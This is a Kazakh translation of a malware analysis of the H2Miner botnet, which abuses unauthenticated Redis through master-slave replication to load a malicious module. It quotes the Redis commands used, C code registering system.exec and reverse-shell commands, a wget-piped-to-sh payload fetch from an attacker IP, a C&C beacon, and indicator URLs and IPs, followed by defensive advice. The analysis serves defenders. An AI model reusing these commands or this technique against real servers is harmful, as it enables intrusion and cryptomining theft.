Бір күн бұрын менің жобамның серверлерінің біріне ұқсас құрт шабуыл жасады. «Бұл не болды?» Деген сұраққа жауап іздеуде. Мен Alibaba Cloud Security командасының тамаша мақаласын таптым. Мен бұл мақаланы Хабреден таппағандықтан, оны сізге арнайы аударуды жөн көрдім <3
кіру
Жақында Alibaba Cloud қауіпсіздік тобы H2Miner кенеттен өршуін анықтады. Зиянды құрттың бұл түрі Redis үшін авторизацияның жоқтығын немесе әлсіз құпия сөздерді сіздің жүйелеріңізге шлюз ретінде пайдаланады, содан кейін ол өзінің зиянды модулін негізгі-құлдық синхрондау арқылы құлмен синхрондайды және соңында осы зиянды модульді шабуылдаған құрылғыға жүктеп алып, зиянды әрекетті орындайды. нұсқаулар.
Бұрын сіздің жүйелеріңізге жасалған шабуылдар, ең алдымен, шабуылдаушы Redis жүйесіне кіргеннен кейін компьютеріңізге жазылған жоспарланған тапсырмаларды немесе SSH кілттерін қамтитын әдіс арқылы жүзеге асырылды. Бақытымызға орай, бұл әдіс рұқсатты басқару ақауларына немесе әртүрлі жүйе нұсқаларына байланысты жиі қолданыла алмайды. Дегенмен, зиянды модульді жүктеудің бұл әдісі шабуылдаушының пәрмендерін тікелей орындай алады немесе жүйеңіз үшін қауіпті қабықшаға қол жеткізе алады.
Интернетте орналастырылған Redis серверлерінің үлкен санына байланысты (1 миллионға жуық), Alibaba Cloud қауіпсіздік тобы, достық ескерту ретінде пайдаланушыларға Redis-ті желіде бөліспеуді және олардың құпия сөздерінің күшін және олардың бұзылғанын үнемі тексеріп отыруды ұсынады. жылдам таңдау.
H2 Miner
H2Miner – Linux жүйесіне негізделген жүйелерге арналған тау-кен өндіруші ботнет, ол жүйеңізге әртүрлі тәсілдермен, соның ішінде Hadoop жіпінде, Docker және Redis қашықтан пәрменді орындау (RCE) осалдықтарында авторизацияның жоқтығын қоса алады. Ботнет деректеріңізді өндіру, шабуылды көлденеңінен кеңейту және командалық және басқару (C&C) байланыстарын қолдау үшін зиянды сценарийлер мен зиянды бағдарламаларды жүктеп алу арқылы жұмыс істейді.
Redis RCE
Бұл тақырып бойынша білімді Павел Топорков ZeroNights 2018-те бөлісті. 4.0 нұсқасынан кейін Redis пайдаланушыларға арнайы Redis пәрмендерін орындау үшін C көмегімен құрастырылған файлдарды Redis ішіне жүктеу мүмкіндігін беретін қосылатын модульді жүктеу мүмкіндігін қолдайды. Бұл функция пайдалы болғанымен, негізгі-құлдық режимінде файлдарды толық қайта синхрондау режимі арқылы құлмен синхрондауға болатын осалдықты қамтиды. Мұны шабуылдаушы зиянды файлдарды тасымалдау үшін пайдалана алады. Тасымалдау аяқталғаннан кейін шабуылдаушылар модульді шабуыл жасалған Redis данасына жүктейді және кез келген пәрменді орындайды.
Зиянды бағдарламалық құрал құрттарын талдау
Жақында Alibaba Cloud қауіпсіздік тобы H2Miner зиянды кеншілер тобының мөлшері кенеттен күрт өскенін анықтады. Талдауға сәйкес, шабуылдың жалпы процесі келесідей:
H2Miner толыққанды шабуыл үшін RCE Redis пайдаланады. Шабуылшылар алдымен қорғалмаған Redis серверлеріне немесе әлсіз құпия сөздері бар серверлерге шабуыл жасайды.
Содан кейін олар пәрменді пайдаланады config set dbfilename red2.so файл атауын өзгерту үшін. Осыдан кейін шабуылдаушылар пәрменді орындайды slaveof басты-құл репликациясының хост мекенжайын орнату үшін.
Шабуылға ұшыраған Redis данасы шабуылдаушыға тиесілі зиянды Redis бағдарламасымен негізгі-құлалық қосылымын орнатқанда, шабуылдаушы файлдарды синхрондау үшін fullresync пәрменін пайдаланып вирус жұққан модульді жібереді. Содан кейін red2.so файлы шабуыл жасалған құрылғыға жүктеледі. Содан кейін шабуылдаушылар осы файлды жүктеу үшін ./red2.so жүктеу модулін пайдаланады. Модуль шабуылдаушыдан пәрмендерді орындай алады немесе шабуылға ұшыраған құрылғыға қол жеткізу үшін кері қосылымды (backdoor) бастайды.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
сияқты зиянды пәрменді орындағаннан кейін / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, шабуылдаушы сақтық көшірме файлының атауын қалпына келтіреді және іздерді тазалау үшін жүйелік модульді босатады. Дегенмен, red2.so файлы әлі де шабуылға ұшыраған құрылғыда қалады. Пайдаланушыларға Redis данасы қалтасында осындай күдікті файлдың бар-жоғына назар аудару ұсынылады.
Ресурстарды ұрлау үшін кейбір зиянды процестерді жоюмен қатар, шабуылдаушы зиянды екілік файлдарды жүктеп алу және орындау арқылы зиянды сценарийді ұстанды. . Бұл процесс атауы немесе хосттағы kinsing бар каталог атауы құрылғының осы вирус жұқтырғанын көрсетуі мүмкін дегенді білдіреді.
Кері инженерия нәтижелеріне сәйкес зиянды бағдарлама негізінен келесі функцияларды орындайды:
- Файлдарды жүктеу және оларды орындау
- тау-кен ісі
- C&C байланысын қамтамасыз ету және шабуылдаушы командаларды орындау
Әсеріңізді кеңейту үшін сыртқы сканерлеу үшін masscan пайдаланыңыз. Сонымен қатар, C&C серверінің IP мекенжайы бағдарламада қатаң кодталған және шабуылға ұшыраған хост HTTP тақырыптарында зомби (бұзылған сервер) ақпараты анықталған HTTP сұраулары арқылы C&C байланыс серверімен байланысады.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Басқа шабуыл әдістері
Құрт пайдаланатын мекенжайлар мен сілтемелер
/туыстық
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Кеңес
Біріншіден, Redis интернеттен қол жетімді болмауы керек және күшті құпия сөзбен қорғалуы керек. Сондай-ақ, клиенттер Redis каталогында red2.so файлының жоқтығын және хосттағы файл/процесс атауында «кинsing» жоқ екенін тексеруі маңызды.
Ақпарат көзі: www.habr.com